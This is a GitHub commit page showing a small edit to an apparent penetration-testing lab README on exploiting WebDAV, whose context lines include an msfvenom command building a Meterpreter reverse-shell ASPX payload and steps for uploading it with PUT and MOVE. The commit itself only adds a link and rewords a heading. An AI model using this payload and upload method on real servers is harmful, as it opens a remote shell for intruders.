Skip to content

Commit

Permalink
Minor updates
Browse files Browse the repository at this point in the history
  • Loading branch information
billburn committed Jul 17, 2020
1 parent 940a900 commit f10c35c
Showing 1 changed file with 2 additions and 1 deletion.
3 changes: 2 additions & 1 deletion Webdav/README.md
Original file line number Diff line number Diff line change
Expand Up @@ -66,6 +66,7 @@ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.49 LPORT=443 -f aspx
![Davtest-07](https://github.com/billburn/penetration-testing/blob/master/Webdav/Images/davtest-07.png)

## MOVING the .html to .aspx to complete the Reverse Shell
[URL] (https://docs.microsoft.com/en-us/previous-versions/office/developer/exchange-server-2003/aa142926(v=exchg.65))

```
1) Back in the repeater tab Manipulate the HTTP Method from PUT to MOVE
Expand All @@ -76,7 +77,7 @@ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.49 LPORT=443 -f aspx

![Davtest-08](https://github.com/billburn/penetration-testing/blob/master/Webdav/Images/davtest-08.png)

## Browse to http://10.10.10.15/shell.aspx
## Browse to location of /shell.aspx


![Davtest-09](https://github.com/billburn/penetration-testing/blob/master/Webdav/Images/davtest-09.png)

0 comments on commit f10c35c

Please sign in to comment.